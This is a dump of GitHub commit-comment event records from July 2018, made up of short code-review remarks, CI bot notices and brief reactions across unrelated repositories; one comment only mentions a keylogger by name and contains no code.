{"id":"7957805533","type":"CommitCommentEvent","actor":{"login":"ericmuyser"},"repo":{"name":"hyperbridge/blockhub-web-client"},"payload":{"comment":{"id":29688835,"position":682,"line":819,"path":"src/ui/screens/account-signup/index.vue","commit_id":"1e87b52cb6b445917469cee1c8c91667165e95f0","created_at":"2018-07-12T17:58:53Z","updated_at":"2018-07-12T17:58:53Z","author_association":"MEMBER","body":"button-blk (dash for consistency)"}},"created_at":"2018-07-12T17:58:53Z"}
{"id":"7957808919","type":"CommitCommentEvent","actor":{"login":"hughsie"},"repo":{"name":"hughsie/fwupd"},"payload":{"comment":{"id":29688848,"position":null,"line":null,"path":null,"commit_id":"9cc84a1b35839ceccaa41c0b5ef156d68bb55be4","created_at":"2018-07-12T17:59:34Z","updated_at":"2018-07-12T17:59:34Z","author_association":"OWNER","body":"I did `tx pull --all --minimum-perc=5` -- maybe this failed?"}},"created_at":"2018-07-12T17:59:34Z"}
{"id":"7957812905","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29688865,"position":5,"line":51,"path":"monopoly.py","commit_id":"fea96e48dd895f8969ba2d6fc1859ebc22c56b84","created_at":"2018-07-12T18:00:21Z","updated_at":"2018-07-12T18:00:21Z","author_association":"NONE","body":"Stylistic comment:\r\n\r\nI'd give `holdable` a default and pass it as a keyword argument. It's somewhat hard to see at a glance which cards are holdable. \r\n\r\n```\r\nCard('From sale of stock you get $50', from_sale_of_stock_50),\r\nCard('Get out of Jail Free', get_out_jail_free, holdable=True),\r\nCard('Go to Jail', go_to_jail),\r\n```"}},"created_at":"2018-07-12T18:00:21Z"}
{"id":"7957813441","type":"CommitCommentEvent","actor":{"login":"Konfekt"},"repo":{"name":"joereynolds/joereynolds.github.io"},"payload":{"comment":{"id":29688867,"position":null,"line":null,"path":null,"commit_id":"aaf66d31116be4fcf7396e089e412c985b6951bb","created_at":"2018-07-12T18:00:27Z","updated_at":"2018-07-12T18:00:27Z","author_association":"NONE","body":"Regarding a diary, how about  this command:\r\n```vim\r\nif !exists('g:diary_directory') | let g:diary_directory = '~' | endif\r\nif !exists('g:diary_extension') | let g:diary_extension = 'txt' | endif\r\ncommand! -nargs=0 Diary exe 'edit ' .\r\n      \\ g:diary_directory . (exists('+shellslash') && !&g:shellslash ? '\\' : '/') . \r\n      \\ strftime('%Y-%m-%d.') . g:diary_extension\r\n```"}},"created_at":"2018-07-12T18:00:27Z"}
{"id":"7957813904","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"evert/evert.github.com"},"payload":{"comment":{"id":29688871,"position":null,"line":null,"path":null,"commit_id":"99b7eb07454ad61e39199d17592a962f355c7453","created_at":"2018-07-12T18:00:32Z","updated_at":"2018-07-12T18:00:32Z","author_association":"CONTRIBUTOR","body":"I guess this post is missing a statement regarding other php resources then memory, like how generators compare to iterators/arrays in terms of speed/execution-time"}},"created_at":"2018-07-12T18:00:32Z"}
{"id":"7957825555","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29688889,"position":null,"line":null,"path":null,"commit_id":"8a7c1c4020c3306467d74e0467db73c99902a033","created_at":"2018-07-12T18:02:49Z","updated_at":"2018-07-12T18:02:49Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-180248 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-180248\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T18:02:49Z"}
{"id":"7957828260","type":"CommitCommentEvent","actor":{"login":"dehann"},"repo":{"name":"JuliaRobotics/IncrementalInference.jl"},"payload":{"comment":{"id":29688895,"position":14,"line":932,"path":"src/SolveTree01.jl","commit_id":"4ef52d591580b7f2b3c549af7ba998e1d7732e2a","created_at":"2018-07-12T18:03:21Z","updated_at":"2018-07-12T18:03:21Z","author_association":"COLLABORATOR","body":"might also fix JuliaRobotics/Caesar.jl#107"}},"created_at":"2018-07-12T18:03:21Z"}
{"id":"7957829348","type":"CommitCommentEvent","actor":{"login":"Kankarollo"},"repo":{"name":"Kankarollo/LibraryApp"},"payload":{"comment":{"id":29688898,"position":null,"line":null,"path":null,"commit_id":"be4c42ccfef353bd95b4a63d9252252f0b5f3e02","created_at":"2018-07-12T18:03:33Z","updated_at":"2018-07-12T18:03:33Z","author_association":"OWNER","body":"Added deletingBooks feature"}},"created_at":"2018-07-12T18:03:33Z"}
{"id":"7957831096","type":"CommitCommentEvent","actor":{"login":"marcoabreu"},"repo":{"name":"apache/incubator-mxnet"},"payload":{"comment":{"id":29688901,"position":null,"line":null,"path":null,"commit_id":"ece12eab2014082b715d12b33c574242fedef86e","created_at":"2018-07-12T18:03:54Z","updated_at":"2018-07-12T18:03:54Z","author_association":"CONTRIBUTOR","body":"Are you sure it's that? We never had a problem with the fact that we ran many workers - we rather ran into deadlock issues that surfaced due to the high number of workers. "}},"created_at":"2018-07-12T18:03:54Z"}
{"id":"7957831661","type":"CommitCommentEvent","actor":{"login":"EchoSpark267"},"repo":{"name":"Code-Bullet/Google-Chrome-Dino-Game-AI"},"payload":{"comment":{"id":29688902,"position":null,"line":null,"path":null,"commit_id":"9d601157baf4de54b20454170af8d276c526e113","created_at":"2018-07-12T18:04:01Z","updated_at":"2018-07-12T18:04:01Z","author_association":"NONE","body":"I need help, I dont know if you will see this but how do i use it? i am a \"noob\" at codeing and am not very good. I downloaded the files and processing and everything, but all the project files come separate. How do i put them together? Another issue i have is that for some reason after i close processing it wont let me enter it again, please help!"}},"created_at":"2018-07-12T18:04:01Z"}
{"id":"7957832578","type":"CommitCommentEvent","actor":{"login":"zhurlik"},"repo":{"name":"Brest-Java-Course-2018/Dmitriy-Shestak"},"payload":{"comment":{"id":29688905,"position":76,"line":76,"path":"camel-integration/src/main/java/com/moro/camel/integration/processor/SoapExecutorProcessor.java","commit_id":"69e9f36d472b240a07bf98971290459d5637a9f0","created_at":"2018-07-12T18:04:12Z","updated_at":"2018-07-12T18:04:12Z","author_association":"NONE","body":"https://www.mkyong.com/java-best-practices/constant-value-should-always-come-first-in-comparison/"}},"created_at":"2018-07-12T18:04:12Z"}
{"id":"7957835687","type":"CommitCommentEvent","actor":{"login":"joye-ramone"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29688913,"position":null,"line":null,"path":null,"commit_id":"3923a16286573676e7a80d6a4877d0876f104c87","created_at":"2018-07-12T18:04:48Z","updated_at":"2018-07-12T18:04:48Z","author_association":"CONTRIBUTOR","body":"Понял, спасибо!"}},"created_at":"2018-07-12T18:04:48Z"}
{"id":"7957836850","type":"CommitCommentEvent","actor":{"login":"saghul"},"repo":{"name":"jitsi/jitsi-meet"},"payload":{"comment":{"id":29688916,"position":null,"line":null,"path":null,"commit_id":"bfdfb5321c5744b10f9b75411a5530f27e74282b","created_at":"2018-07-12T18:05:03Z","updated_at":"2018-07-12T18:05:03Z","author_association":"MEMBER","body":"🎉🎉🎉"}},"created_at":"2018-07-12T18:05:03Z"}
{"id":"7957843074","type":"CommitCommentEvent","actor":{"login":"gitimichie"},"repo":{"name":"gitimichie/KeyWords"},"payload":{"comment":{"id":29688921,"position":null,"line":null,"path":null,"commit_id":"67e3e875f863cec27724a43fb3e296632709a346","created_at":"2018-07-12T18:06:17Z","updated_at":"2018-07-12T18:06:17Z","author_association":"OWNER","body":"Checked first publish"}},"created_at":"2018-07-12T18:06:17Z"}
{"id":"7957844648","type":"CommitCommentEvent","actor":{"login":"EchoSpark267"},"repo":{"name":"Code-Bullet/Google-Chrome-Dino-Game-AI"},"payload":{"comment":{"id":29688928,"position":null,"line":null,"path":null,"commit_id":"c0717dbfacdd04281bb180df68ef6ea2ae4c47aa","created_at":"2018-07-12T18:06:36Z","updated_at":"2018-07-12T18:06:36Z","author_association":"NONE","body":"Can you please explain to me what to do after I download the files? It is kinda vague."}},"created_at":"2018-07-12T18:06:36Z"}
{"id":"7957849694","type":"CommitCommentEvent","actor":{"login":"Renanse"},"repo":{"name":"Renanse/Ardor3D"},"payload":{"comment":{"id":29688940,"position":null,"line":null,"path":null,"commit_id":"38863508cc3fca59dce852e92aa3a5ec341e887b","created_at":"2018-07-12T18:07:38Z","updated_at":"2018-07-12T18:07:38Z","author_association":"OWNER","body":"Playing with lwjgl3 mostly ;)"}},"created_at":"2018-07-12T18:07:38Z"}
{"id":"7957849966","type":"CommitCommentEvent","actor":{"login":"efaust"},"repo":{"name":"binast/binjs-ts"},"payload":{"comment":{"id":29688941,"position":null,"line":null,"path":null,"commit_id":"a15aa3e04c0a7b6922296f6e71e4c2a809407ff2","created_at":"2018-07-12T18:07:41Z","updated_at":"2018-07-12T18:07:41Z","author_association":"NONE","body":"This all looks sensible to me"}},"created_at":"2018-07-12T18:07:41Z"}
{"id":"7957850838","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29688943,"position":null,"line":null,"path":null,"commit_id":"4b9a384892c3042ab58c0ef8e1d48ac8f85cbef6","created_at":"2018-07-12T18:07:52Z","updated_at":"2018-07-12T18:07:52Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-12T18:07:52Z"}
{"id":"7957852375","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29688947,"position":37,"line":141,"path":"monopoly.py","commit_id":"fea96e48dd895f8969ba2d6fc1859ebc22c56b84","created_at":"2018-07-12T18:08:11Z","updated_at":"2018-07-12T18:08:11Z","author_association":"NONE","body":"You save yourself a ton of typing (well, could have) and make this easier to maintain by extracting the code that makes the `Structure`s:\r\n\r\nConsider:\r\n```\r\npossible_structures=[Structure('house', 100, 60), Structure('house', 100, 180), Structure('house', 100, 500), Structure('house', 100, 700), Structure('hotel', 100, 900)]\r\n```\r\n\r\nvs\r\n\r\n```\r\ndef make_structures(structure_price, rents):\r\n    # could make this take three arguments (house_price, hotel_price, rents) if house/hotel cost different, but you get the idea\r\n    return [Structure('house', structure_price, rent) for rent in rents[:-1]] + Structure('hotel', structure_price, rents[-1])\r\n# ...\r\n\r\npossible_structures=make_structures(100, [60, 180, 500, 700, 900])\r\n\r\n```"}},"created_at":"2018-07-12T18:08:11Z"}
{"id":"7957852385","type":"CommitCommentEvent","actor":{"login":"TimRie"},"repo":{"name":"TimRie/HelloWorld"},"payload":{"comment":{"id":29688948,"position":null,"line":null,"path":null,"commit_id":"d37cb731030242e8325b0cd73c854b2737bee5e6","created_at":"2018-07-12T18:08:11Z","updated_at":"2018-07-12T18:08:11Z","author_association":"OWNER","body":"check"}},"created_at":"2018-07-12T18:08:11Z"}
{"id":"7957853916","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"QuiltedTuba2798/FactionsPro"},"payload":{"comment":{"id":29688953,"position":null,"line":null,"path":null,"commit_id":"32e69ddb56def3ce800aa046e24076feddae42e9","created_at":"2018-07-12T18:08:28Z","updated_at":"2018-07-12T18:08:28Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/QuiltedTuba2798/FactionsPro/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `93065390-85fe-11e8-9156-f25d5f36b04c`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-12T18:08:28Z"}
{"id":"7957855190","type":"CommitCommentEvent","actor":{"login":"zhurlik"},"repo":{"name":"Brest-Java-Course-2018/Dmitriy-Shestak"},"payload":{"comment":{"id":29688958,"position":22,"line":63,"path":"camel-integration/src/main/java/com/moro/camel/integration/processor/SoapExecutorProcessor.java","commit_id":"cd9ad0a16cc41b10588f91d4c6c4ce93d765c67c","created_at":"2018-07-12T18:08:44Z","updated_at":"2018-07-12T18:08:44Z","author_association":"NONE","body":"There are a lot of if-else, I think that a few of them at least:GET, PUT, POST could be extracted to separated methods and replaced to switch-case"}},"created_at":"2018-07-12T18:08:44Z"}
{"id":"7957856910","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29688966,"position":null,"line":null,"path":null,"commit_id":"fdac60674d54112cd5bae19059b954cead7d80f3","created_at":"2018-07-12T18:09:04Z","updated_at":"2018-07-12T18:09:04Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-180903 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-180903\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T18:09:04Z"}
{"id":"7957858078","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"QuiltedTuba2798/FactionsPro"},"payload":{"comment":{"id":29688968,"position":null,"line":null,"path":null,"commit_id":"712dc76a325cdfc1a4c78585e5485fe400c36363","created_at":"2018-07-12T18:09:19Z","updated_at":"2018-07-12T18:09:19Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/QuiltedTuba2798/FactionsPro/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `b1868f92-85fe-11e8-84e3-c701b5ea8ac5`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-12T18:09:19Z"}
{"id":"7957860984","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"QuiltedTuba2798/FactionsPro"},"payload":{"comment":{"id":29688977,"position":null,"line":null,"path":null,"commit_id":"05eca54730f28611dc6f6bfda4eb56c6ac5a4ba0","created_at":"2018-07-12T18:09:56Z","updated_at":"2018-07-12T18:09:56Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/QuiltedTuba2798/FactionsPro/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `c765229c-85fe-11e8-95d1-a618529ea150`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-12T18:09:56Z"}
{"id":"7957865929","type":"CommitCommentEvent","actor":{"login":"shivasairam101"},"repo":{"name":"CampusDiariesRepos/ionic-client"},"payload":{"comment":{"id":29688991,"position":null,"line":null,"path":null,"commit_id":"dadaf3113a59d872799c282812fcf8a045443825","created_at":"2018-07-12T18:10:56Z","updated_at":"2018-07-12T18:10:56Z","author_association":"MEMBER","body":"Good work"}},"created_at":"2018-07-12T18:10:56Z"}
{"id":"7957866110","type":"CommitCommentEvent","actor":{"login":"mbutterick"},"repo":{"name":"mbutterick/brag"},"payload":{"comment":{"id":29688992,"position":null,"line":null,"path":null,"commit_id":"bfacb563df712a83f644352af840114fda185f33","created_at":"2018-07-12T18:10:59Z","updated_at":"2018-07-12T18:10:59Z","author_association":"OWNER","body":"You are the wind beneath my wings, @jeapostrophe"}},"created_at":"2018-07-12T18:10:59Z"}
{"id":"7957869471","type":"CommitCommentEvent","actor":{"login":"zhurlik"},"repo":{"name":"Brest-Java-Course-2018/Dmitriy-Shestak"},"payload":{"comment":{"id":29688999,"position":26,"line":29,"path":"camel-integration/src/main/java/com/moro/camel/integration/factory/EndpointFactory.java","commit_id":"06e6bbc2d1b3a0648a4afd7c871a617ea4f93d54","created_at":"2018-07-12T18:11:39Z","updated_at":"2018-07-12T18:11:39Z","author_association":"NONE","body":"https://stackoverflow.com/questions/10477607/avoid-printstacktrace-use-a-logger-call-instead"}},"created_at":"2018-07-12T18:11:39Z"}
{"id":"7957870260","type":"CommitCommentEvent","actor":{"login":"matematicaifspitp"},"repo":{"name":"matematicaifspitp/matematicaifspitp"},"payload":{"comment":{"id":29689002,"position":null,"line":null,"path":null,"commit_id":"5a3e9f574f4ddece5f2078ccd4948af819fd8669","created_at":"2018-07-12T18:11:50Z","updated_at":"2018-07-12T18:11:50Z","author_association":"OWNER","body":"primeira atualização"}},"created_at":"2018-07-12T18:11:50Z"}
{"id":"7957871096","type":"CommitCommentEvent","actor":{"login":"namannik"},"repo":{"name":"abelectronicsuk/ABElectronics_Python_Libraries"},"payload":{"comment":{"id":29689007,"position":null,"line":null,"path":null,"commit_id":"e562704aa41c9d1057871db3f8a978f8d46aa116","created_at":"2018-07-12T18:12:00Z","updated_at":"2018-07-12T18:12:00Z","author_association":"CONTRIBUTOR","body":"This change should probably also be made in the ADCDifferentialPi code.\r\n\r\nhttps://github.com/abelectronicsuk/ABElectronics_Python_Libraries/blob/master/ADCDifferentialPi/ADCDifferentialPi.py\r\n\r\nBetter yet, both ADCPi.py and ADCDifferentialPi.py could be merged into one file, since the only difference between the two is the `read_voltage` function.  Perhaps the common code could be contained in a base class, with two subclasses that each contain a `read_voltage` function.  I'd be willing to make this change and submit a pull request."}},"created_at":"2018-07-12T18:12:00Z"}
{"id":"7957873661","type":"CommitCommentEvent","actor":{"login":"jfelrod1960"},"repo":{"name":"Renanse/Ardor3D"},"payload":{"comment":{"id":29689014,"position":null,"line":null,"path":null,"commit_id":"38863508cc3fca59dce852e92aa3a5ec341e887b","created_at":"2018-07-12T18:12:32Z","updated_at":"2018-07-12T18:12:32Z","author_association":"NONE","body":"Cool! 👍 "}},"created_at":"2018-07-12T18:12:32Z"}
{"id":"7957877876","type":"CommitCommentEvent","actor":{"login":"DahliaSR"},"repo":{"name":"CheckiO/checkio-client"},"payload":{"comment":{"id":29689021,"position":11,"line":11,"path":"checkio_client/actions/init.py","commit_id":"926cbdeaa3e45abd29c35d87abc4b87c0c756fcf","created_at":"2018-07-12T18:13:24Z","updated_at":"2018-07-12T18:13:24Z","author_association":"NONE","body":"**Change from:** \r\n   'out and filename can be used together'\r\n**To:**\r\n   'out and filename can **not** be used together'"}},"created_at":"2018-07-12T18:13:24Z"}
{"id":"7957882254","type":"CommitCommentEvent","actor":{"login":"Tropicalrambler"},"repo":{"name":"sihaysistema/factura_electronica_gt"},"payload":{"comment":{"id":29689031,"position":null,"line":null,"path":null,"commit_id":"7ffc22a0954e093f1b551a36f0cd125ff090d125","created_at":"2018-07-12T18:14:19Z","updated_at":"2018-07-12T18:14:19Z","author_association":"COLLABORATOR","body":"Autorizado!"}},"created_at":"2018-07-12T18:14:19Z"}
{"id":"7957891129","type":"CommitCommentEvent","actor":{"login":"sairamanareddy"},"repo":{"name":"sairamanareddy/Exploits-docs"},"payload":{"comment":{"id":29689050,"position":null,"line":null,"path":null,"commit_id":"aac1cf26800da5d002aa4734d535184786fe463b","created_at":"2018-07-12T18:16:07Z","updated_at":"2018-07-12T18:16:07Z","author_association":"OWNER","body":"Simple Python Keylogger for windows."}},"created_at":"2018-07-12T18:16:07Z"}
{"id":"7957891642","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29689054,"position":null,"line":null,"path":null,"commit_id":"5368b9fb15e84646740a10a482e96978176e47bb","created_at":"2018-07-12T18:16:13Z","updated_at":"2018-07-12T18:16:13Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-181612 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-181612\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T18:16:13Z"}
{"id":"7957898390","type":"CommitCommentEvent","actor":{"login":"okx-code"},"repo":{"name":"PiggyPiglet/TimeAPI"},"payload":{"comment":{"id":29689069,"position":null,"line":null,"path":null,"commit_id":"a891b5f3708144fdd4a39019a1dc506a03356122","created_at":"2018-07-12T18:17:33Z","updated_at":"2018-07-12T18:17:33Z","author_association":"NONE","body":"You removed the tests?"}},"created_at":"2018-07-12T18:17:33Z"}
{"id":"7957902757","type":"CommitCommentEvent","actor":{"login":"mattbeatty"},"repo":{"name":"masonkmeyer/serilog-sinks-amazonkinesis"},"payload":{"comment":{"id":29689078,"position":null,"line":null,"path":null,"commit_id":"7fc1164bf6ff247104c9f54cfdc1a7c63ead6266","created_at":"2018-07-12T18:18:24Z","updated_at":"2018-07-12T18:18:24Z","author_association":"NONE","body":"This looks good. I have tested and verified that this works and prevents locks across shared files."}},"created_at":"2018-07-12T18:18:24Z"}
{"id":"7957904621","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689080,"position":42,"line":1,"path":"webview/app/src/main/java/com/example/simonedigiorgio/webview/MainActivity.java","commit_id":"aa3d1b64c8c98bee74eaf58ad8634678f52b31ca","created_at":"2018-07-12T18:18:46Z","updated_at":"2018-07-12T18:18:46Z","author_association":"NONE","body":"Uhm. Mistake? "}},"created_at":"2018-07-12T18:18:46Z"}
{"id":"7957907862","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29689087,"position":null,"line":null,"path":null,"commit_id":"1b736e737448879533c1862f9723c0da773a4399","created_at":"2018-07-12T18:19:28Z","updated_at":"2018-07-12T18:19:28Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mastercard: Židle org 1 a org 2](https://trello.com/c/N5LQguEV/579-mastercard-%C5%BEidle-org-1-a-org-2)"}},"created_at":"2018-07-12T18:19:28Z"}
{"id":"7957909125","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689089,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-12T18:19:43Z","updated_at":"2018-07-12T18:19:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:19:43Z"}
{"id":"7957912307","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689095,"position":2,"line":11,"path":"webview/app/src/main/java/com/example/simonedigiorgio/webview/second.java","commit_id":"aa3d1b64c8c98bee74eaf58ad8634678f52b31ca","created_at":"2018-07-12T18:20:20Z","updated_at":"2018-07-12T18:20:20Z","author_association":"NONE","body":"You need to go through the Java Style Guidelines: https://google.github.io/styleguide/javaguide.html\r\n\r\nJust few:\r\n- CLASS ARE IN CAPITAL LETTER\r\n- Global variables should start for m and be camel case. E.g.: mBrowser"}},"created_at":"2018-07-12T18:20:20Z"}
{"id":"7957915050","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689106,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-12T18:20:54Z","updated_at":"2018-07-12T18:20:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:20:54Z"}
{"id":"7957918463","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689109,"position":22,"line":18,"path":"webview/app/src/main/java/com/example/simonedigiorgio/webview/second.java","commit_id":"aa3d1b64c8c98bee74eaf58ad8634678f52b31ca","created_at":"2018-07-12T18:21:34Z","updated_at":"2018-07-12T18:21:34Z","author_association":"NONE","body":"\"toy\" is just a random name. Variables and method names are the key to readable code. Reading from your name I should be able to understand what this function/variable does. In this was you can avoid verbose comments."}},"created_at":"2018-07-12T18:21:34Z"}
